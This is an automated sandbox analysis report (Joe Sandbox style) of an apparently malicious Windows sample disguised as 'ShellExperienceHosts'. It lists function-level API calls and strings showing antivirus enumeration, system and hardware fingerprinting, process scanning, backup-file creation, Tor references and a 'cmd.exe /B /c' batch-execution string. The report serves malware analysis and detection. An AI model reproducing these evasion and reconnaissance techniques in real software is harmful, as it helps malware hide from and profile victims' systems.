                                                                            • String ID: -N/$NO/$None/%s
                                                                            • API String ID: 3036438616-3095023699
                                                                            • Opcode ID: 883265be0521896294417c328415768930055d90fba3d40879c0678cadc78ddd
                                                                            • Instruction ID: 7731d666c322a1fd05abbf785e1e9679b5979c5d991f95f42d014c88170ac801
                                                                            • Opcode Fuzzy Hash: 883265be0521896294417c328415768930055d90fba3d40879c0678cadc78ddd
                                                                            • Instruction Fuzzy Hash: C5417174900228AFDB24EB61DCCAFEF7ABCEF09710F044495F605A6245DB74E994CBA1
                                                                            Function 6C6BAD11 Relevance: 30.5, APIs: 9, Strings: 8, Instructions: 787COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: .batkup.$.battor.$.bat$.pid$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$tor.
                                                                            • API String ID: 4218353326-3685226845
                                                                            • Opcode ID: 2f6616840bcc40d84e0731d095451dd084b9302d5c05873005fd310a26bbaf2d
                                                                            • Instruction ID: bcc8e9e4d5fcb6ff9d54a4f80f5df6389782b3d47f66e19e6d19008c9fb0cc59
                                                                            • Opcode Fuzzy Hash: 2f6616840bcc40d84e0731d095451dd084b9302d5c05873005fd310a26bbaf2d
                                                                            • Instruction Fuzzy Hash: 6062ACB1600B008BD325CF38C890BA6B7E5FF89318F144A2DD4AB97B91EB31F5558B59
                                                                            Function 03326150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3708 3326150-33261a5 call 3336770 call 333004b 3713 3326201-3326228 CoCreateInstance 3708->3713 3714 33261a7-33261ae 3708->3714 3716 3326422-332642f lstrlenW 3713->3716 3717 332622e-3326282 3713->3717 3715 33261b0-33261b2 call 3326050 3714->3715 3722 33261b7-33261b9 3715->3722 3719 3326441-3326450 3716->3719 3720 3326431-332643b lstrcatW 3716->3720 3725 332640a-3326418 3717->3725 3726 3326288-33262a2 3717->3726 3723 3326452-3326457 3719->3723 3724 332645a-332647a call 332f00a 3719->3724 3720->3719 3727 33261db-33261ff call 333004b 3722->3727 3728 33261bb-33261d9 lstrcatW * 2 3722->3728 3723->3724 3725->3716 3730 332641a-332641f 3725->3730 3726->3725 3735 33262a8-33262b4 3726->3735 3727->3713 3727->3715 3728->3727 3730->3716 3736 33262c0-3326363 call 3336770 wsprintfW RegOpenKeyExW 3735->3736 3739 33263e9-33263ff 3736->3739 3740 3326369-33263ba call 3336770 RegQueryValueExW 3736->3740 3742 3326402-3326404 3739->3742 3744 33263dc-33263e3 RegCloseKey 3740->3744 3745 33263bc-33263da lstrcatW * 2 3740->3745 3742->3725 3742->3736 3744->3739 3745->3744
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0332618B
                                                                            • lstrcatW.KERNEL32(03351F10,0334510C,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 033261CD
                                                                            • lstrcatW.KERNEL32(03351F10,0334535C,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 033261D9
                                                                            • CoCreateInstance.OLE32(03342480,00000000,00000017,0334578C,?,?,18F775C8,00000AD4,00000000,75BF73E0), ref: 03326220
                                                                            • _memset.LIBCMT ref: 033262CE
                                                                            • wsprintfW.USER32 ref: 03326336
                                                                            • RegOpenKeyExW.KERNELBASE(80000000,?,00000000,00020019,?), ref: 0332635F
                                                                            • _memset.LIBCMT ref: 03326376
                                                                              • Part of subcall function 03326050: _memset.LIBCMT ref: 0332607C
                                                                              • Part of subcall function 03326050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03326088
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                            • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                            • API String ID: 1221949200-1583895642
                                                                            • Opcode ID: e09cb9e7d08cbdcb74b55c00d963a02f390d9e9fe046643d5a53402ded3b5686
                                                                            • Instruction ID: d115d93cd26fe83e8771f933acb1c95dbdd231f85522f8ded5413c463a33496f
                                                                            • Opcode Fuzzy Hash: e09cb9e7d08cbdcb74b55c00d963a02f390d9e9fe046643d5a53402ded3b5686
                                                                            • Instruction Fuzzy Hash: D68173B5A40268AFDB20DB54CCC1FAEB7BCEF48704F044589F619A7142D7B4AA80CF64
                                                                            Function 03327490 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 99registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03325611,0000035E,000002FA), ref: 0332749C
                                                                            • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 033274B2
                                                                            • swprintf.LIBCMT ref: 033274EF
                                                                              • Part of subcall function 03327410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03327523), ref: 0332743D
                                                                              • Part of subcall function 03327410: GetProcAddress.KERNEL32(00000000), ref: 03327444
                                                                              • Part of subcall function 03327410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03327523), ref: 03327452
                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03327547
                                                                            • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03327563
                                                                            • RegCloseKey.KERNEL32(000002FA), ref: 03327586
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,03325611,0000035E,000002FA), ref: 03327598
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                            • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                            • API String ID: 2158625971-3190923360
                                                                            • Opcode ID: 778933aa77eaf9372afd378492273c8c5497dcea74d57ab0743754d135f3aa6c
                                                                            • Instruction ID: 6fd7f77521e2533c4141e99fcf61f035aa00b919a89ec73caaf984d46578ae0a
                                                                            • Opcode Fuzzy Hash: 778933aa77eaf9372afd378492273c8c5497dcea74d57ab0743754d135f3aa6c
                                                                            • Instruction Fuzzy Hash: ED318475A40318BFE714EBA4DDC5EBFBBBCEB48700F144559BA06E6145EA74EA00C7A0
                                                                            Function 033280F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03328132
                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03328166
                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03328176
                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033281A6
                                                                            • lstrlenW.KERNEL32(?), ref: 033281B7
                                                                            • __wcsnicmp.LIBCMT ref: 033281CE
                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03328204
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03328228
                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03328233
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                            • String ID: A:\$B:\
                                                                            • API String ID: 950920757-1009255891
                                                                            • Opcode ID: d16ed9a0b5a16bcca84fee206aca42cf8310cbd21619961103b26886c9b14b00
                                                                            • Instruction ID: 55e4ab14568314023ce5bd749533f66b1de09fe0436ca856533e0f501f02fed2
                                                                            • Opcode Fuzzy Hash: d16ed9a0b5a16bcca84fee206aca42cf8310cbd21619961103b26886c9b14b00
                                                                            • Instruction Fuzzy Hash: C3417375A012289BDB20EF64DDC4AAEB7BCEF44710F044599EA0AF7144EB74EA05CB94
                                                                            Function 6C6D9953 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(yyzyBase.dll), ref: 6C6D995F
                                                                            • LoadResource.KERNEL32(?,?), ref: 6C6D9A4E
                                                                            • SizeofResource.KERNEL32(?,?), ref: 6C6D9A60
                                                                            • FindResourceW.KERNEL32(?,CONFIG,AFX_DIALOG_LAYOUT), ref: 6C6D9A94
                                                                            • LockResource.KERNEL32(?), ref: 6C6D9ACA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeof
                                                                            • String ID: AFX_DIALOG_LAYOUT$CONFIG$ke*$le*$le*$yyzyBase.dll
                                                                            • API String ID: 1601749889-438318081
                                                                            • Opcode ID: 968317cfa8e5bc098293e08e518d21bb8c5a6ee5dd6465b260c5ad615d2e3015
                                                                            • Instruction ID: 179f09aeff4517170354c7b2a9f19f732355c5f6d98cd73832d107649b47928f
                                                                            • Opcode Fuzzy Hash: 968317cfa8e5bc098293e08e518d21bb8c5a6ee5dd6465b260c5ad615d2e3015
                                                                            • Instruction Fuzzy Hash: C2415975508200AFCA119F59C890A4AFBF1AF9A718F0A4A2AF48896620DB31E854CF57
                                                                            Function 03326790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 03325320: InterlockedDecrement.KERNEL32(00000008), ref: 0332536F
                                                                              • Part of subcall function 03325320: SysFreeString.OLEAUT32(00000000), ref: 03325384
                                                                              • Part of subcall function 03325320: SysAllocString.OLEAUT32(03345148), ref: 033253D5
                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03345148,033269A4,03345148,00000000,75BF73E0), ref: 033267F4
                                                                            • GetLastError.KERNEL32 ref: 033267FE
                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 03326816
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0332681D
                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0332683F
                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03326871
                                                                            • GetLastError.KERNEL32 ref: 0332687B
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 033268E6
                                                                            • HeapFree.KERNEL32(00000000), ref: 033268ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                            • String ID: NONE_MAPPED
                                                                            • API String ID: 1317816589-2950899194
                                                                            • Opcode ID: bd6e1d8a42449d5aef887b776e51b1d23fb07cf474f01da159f72e86b43b7bab
                                                                            • Instruction ID: bb2adfa794e164429e9718af3cd70f6f2e1969efe2882a387d091212b9eb3b87
                                                                            • Opcode Fuzzy Hash: bd6e1d8a42449d5aef887b776e51b1d23fb07cf474f01da159f72e86b43b7bab
                                                                            • Instruction Fuzzy Hash: 8D4176B5900228AFDB20DB64DCC5FAFB7BCEF85701F404498FA09E6140DBB45E858B60
                                                                            Function 03326C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03326C8B
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03326CAA
                                                                            • _memset.LIBCMT ref: 03326CE1
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 03326CF4
                                                                            • swprintf.LIBCMT ref: 03326D39
                                                                            • swprintf.LIBCMT ref: 03326D4C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                            • API String ID: 3202570353-3501811827
                                                                            • Opcode ID: b2fe1d010d9d9a17daa957cb9b2fcd068867397080796e4a9daeb702ca201af6
                                                                            • Instruction ID: fc7d2ac994c9ab9504acd0fc6acc034c882ce7c51f68017accd6884bd23a81e0
                                                                            • Opcode Fuzzy Hash: b2fe1d010d9d9a17daa957cb9b2fcd068867397080796e4a9daeb702ca201af6
                                                                            • Instruction Fuzzy Hash: F2315EB6D0021C9BDB14DFE5DC85BEEB7B9FB48700F50821DE91AAB241DB746905CB50
                                                                            Function 6C6DB654 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 524threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?), ref: 6C6DB675
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C6DB697
                                                                            • _strlen.LIBCMT ref: 6C6DB6B0
                                                                              • Part of subcall function 6C6DB195: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6C6DB1D3
                                                                              • Part of subcall function 6C6DB195: _strlen.LIBCMT ref: 6C6DB1E7
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A446,6C8F1034,00000000,00000000), ref: 6C6DBB3A
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029B35,00000000,00000000,00000000), ref: 6C6DBB4C
                                                                            • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C6DBB62
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C6DBB74
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Module$CreateFileHandleNameThread_strlen$CloseObjectSingleWait
                                                                            • String ID: yyzyBase.dll
                                                                            • API String ID: 3056726666-3796944409
                                                                            • Opcode ID: 24617e9e15a1a12634ecd4491ffbbe80c37ab25d3081041c650c43b9fd6b7cb1
                                                                            • Instruction ID: d0cb69d083c20454687d135488a91acea21aff1888bad557e0ba5ae700929f0b
                                                                            • Opcode Fuzzy Hash: 24617e9e15a1a12634ecd4491ffbbe80c37ab25d3081041c650c43b9fd6b7cb1
                                                                            • Instruction Fuzzy Hash: 981206B1D002089BDB20CF64DC84BEEB7B9FF85308F154629E415A7784EB74B948CB99
                                                                            Function 03326EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDXGIFactory.DXGI(0334579C,?,18F775C8,74DEDF80,00000000,75BF73E0), ref: 03326F4A
                                                                            • swprintf.LIBCMT ref: 0332711E
                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 033271C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                            • API String ID: 3803070356-257307503
                                                                            • Opcode ID: a82d12a974f520e3638a75000120f965cc69dc533d05dced8cc229cc5183fd62
                                                                            • Instruction ID: e6aa78eae49a7ef5f45881eb2f8be503c65d3c498eee27bccd4f0e44364fd75c
                                                                            • Opcode Fuzzy Hash: a82d12a974f520e3638a75000120f965cc69dc533d05dced8cc229cc5183fd62
                                                                            • Instruction Fuzzy Hash: 4BE14271E012359FDF24CA64CCC1BEEB775BF89700F1446E9D909A7285D770AE818B91
                                                                            Function 6C6D9B7B Relevance: 15.5, APIs: 10, Instructions: 547processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C6D9B89
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 6C6D9BC0
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000002,00000000), ref: 6C6D9BEE
                                                                            • _strlen.LIBCMT ref: 6C6D9C05
                                                                            • Process32NextW.KERNEL32(?,?), ref: 6C6D9D30
                                                                            • CloseHandle.KERNEL32(00000000,?,00000002,00000000), ref: 6C6D9D3E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 6C6D9D54
                                                                            • SHGetFolderPathA.SHELL32 ref: 6C6D9DAF
                                                                            • _strlen.LIBCMT ref: 6C6D9DCD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32_strlen$ByteCharCreateFirstFolderMultiNextPathSnapshotToolhelp32Wide
                                                                            • String ID:
                                                                            • API String ID: 2690550405-0
                                                                            • Opcode ID: d8999e6c06b692245730aabcf47dd41eb1286df45d4ea7d76cb729ac310d3fe8
                                                                            • Instruction ID: 96f436c6e3788b9f747b65526b2e8797b3bd890023ed788e78202a595303e1b1
                                                                            • Opcode Fuzzy Hash: d8999e6c06b692245730aabcf47dd41eb1286df45d4ea7d76cb729ac310d3fe8
                                                                            • Instruction Fuzzy Hash: 60124A71E052148BDB14CF68C8807EEB7F6EF89318F264628E415E7781E731AD84CB95
                                                                            Function 6C6DA6CF Relevance: 14.2, APIs: 9, Instructions: 739comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C6DA85C
                                                                            • SHGetFolderPathA.SHELL32 ref: 6C6DA87F
                                                                            • _strlen.LIBCMT ref: 6C6DA89D
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 6C6DAE64
                                                                            • CoInitialize.OLE32(00000000), ref: 6C6DAE76
                                                                            • CoCreateInstance.OLE32(6C89BA78,00000000,00000001,6C88B940,00000000), ref: 6C6DAE8D
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 6C6DAEBC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C6DAF31
                                                                            • CoUninitialize.COMBASE ref: 6C6DAF55
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                                                            • String ID:
                                                                            • API String ID: 1074249417-0
                                                                            • Opcode ID: b76d555f497792d8874c27fecbd96dd9faee8592ba4e2891daef20be107d736b
                                                                            • Instruction ID: 49c0677f9bac7a778e6721b231524915aed174b6389b33bf2cfca5a34ef30c18
                                                                            • Opcode Fuzzy Hash: b76d555f497792d8874c27fecbd96dd9faee8592ba4e2891daef20be107d736b
                                                                            • Instruction Fuzzy Hash: 055205B1D042188FDB14CF68CC847EEBBB6FF89318F154668E419A7781DB30A985CB59
                                                                            Function 03326050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0332607C
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03326088
                                                                            • Process32FirstW.KERNEL32(00000000,00000000), ref: 033260B9
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0332610F
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03326116
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                            • String ID:
                                                                            • API String ID: 2526126748-0
                                                                            • Opcode ID: 7addb5e45c5aa047eff524b0ca62c15d3ce4bf72baf7c1970d4ff888f0f3aec8
                                                                            • Instruction ID: 30cca80e3b987755e6e64bdd18f3f84be98a5d62d2a99296569b9c37b679bcc8
                                                                            • Opcode Fuzzy Hash: 7addb5e45c5aa047eff524b0ca62c15d3ce4bf72baf7c1970d4ff888f0f3aec8
                                                                            • Instruction Fuzzy Hash: 3921B735A04138ABDB20EF64DCD6BFAB77DEF15710F048699ED0A97180EF75AA04C650
                                                                            Function 03323360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Time_memmovetime
                                                                            • String ID:
                                                                            • API String ID: 1463837790-0
                                                                            • Opcode ID: b3ce1b68efdd594968f37e5840b8f8a40350a2c5fdb5e402bd68940d690b3ecf
                                                                            • Instruction ID: fc732b552cdeb74e5b40b70057049a9d5f38a062507367132c51a50f7e0008ec
                                                                            • Opcode Fuzzy Hash: b3ce1b68efdd594968f37e5840b8f8a40350a2c5fdb5e402bd68940d690b3ecf
